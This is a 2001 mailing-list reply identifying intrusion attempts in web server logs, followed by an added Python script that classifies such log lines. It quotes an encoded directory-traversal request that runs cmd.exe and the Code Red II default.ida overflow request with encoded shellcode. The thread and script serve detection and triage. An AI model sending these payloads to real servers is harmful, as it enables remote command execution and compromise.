[ale] Code Red 2
Jonathan Rickman
jonathan at xcorps.net
Tue Aug 7 17:08:35 EDT 2001
On Tue, 7 Aug 2001, Michael Smith wrote:
> Here is what I think is an attempt by the second variant of the code
> red......
>
> Am I right?
sorta...
> 24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET
> /scripts/..%255c..%255cwinnt/
> system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 HTTP/1.0" 404 314 "-"
> "-"
not sure what this is, but it is definitely an intrusion attempt of sorts.
> 209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET
> /default.ida?XXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%
> u909
> 0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8
> b00%
> u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 "-" "-"
> 20
This is CRII.
--
Jonathan Rickman
X Corps Security
http://www.xcorps.net
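
As an added example (not part of the original thread), a small Python triage script that separates the two request shapes quoted above: the `..%255c` path to `cmd.exe`, which percent-decodes in two passes to a backslash traversal, and the `default.ida` request with a long `X` run that the reply identifies as CRII. The sample log lines, the 192.0.2.x addresses, the function names and the 100-character padding threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Request field of an Apache common/combined log line: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
# Query that opens with one character repeated 100+ times (assumed threshold)
PADDING_RE = re.compile(r"(.)\1{99,}")

def fully_decode(text, max_rounds=5):
    """Percent-decode until stable, so %255c -> %5c -> backslash. Returns (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds

def classify(line):
    m = REQUEST_RE.search(line)
    if not m:
        return "unparsed"
    path, _, query = m.group(1).partition("?")
    decoded, rounds = fully_decode(path)
    normalized = decoded.replace("\\", "/").lower()
    # Traversal hidden behind zero or more layers of percent-encoding
    if "../" in normalized:
        return f"traversal:decode-rounds={rounds}"
    # .ida request whose query is a long padding run followed by %u-encoded words
    pad = PADDING_RE.match(query)
    if normalized.endswith(".ida") and pad and "%u" in query.lower():
        return f"ida-padding:{pad.group(1)}"
    return "no-match"

# Constructed sample lines modelled on the two requests quoted in the thread
SAMPLES = [
    '192.0.2.10 - - [06/Aug/2001:13:34:22 -0400] "GET /scripts/..%255c..%255c'
    'winnt/system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+192.0.2.10 HTTP/1.0" 404 314 "-" "-"',
    '192.0.2.20 - - [06/Aug/2001:13:42:00 -0400] "GET /default.ida?' + "X" * 224
    + '%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 285 "-" "-"',
    '192.0.2.30 - - [06/Aug/2001:13:50:00 -0400] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line[:60])
```

A decode-rounds value of 2 or more means the traversal only appears after repeated decoding, which a filter that decodes once will not see.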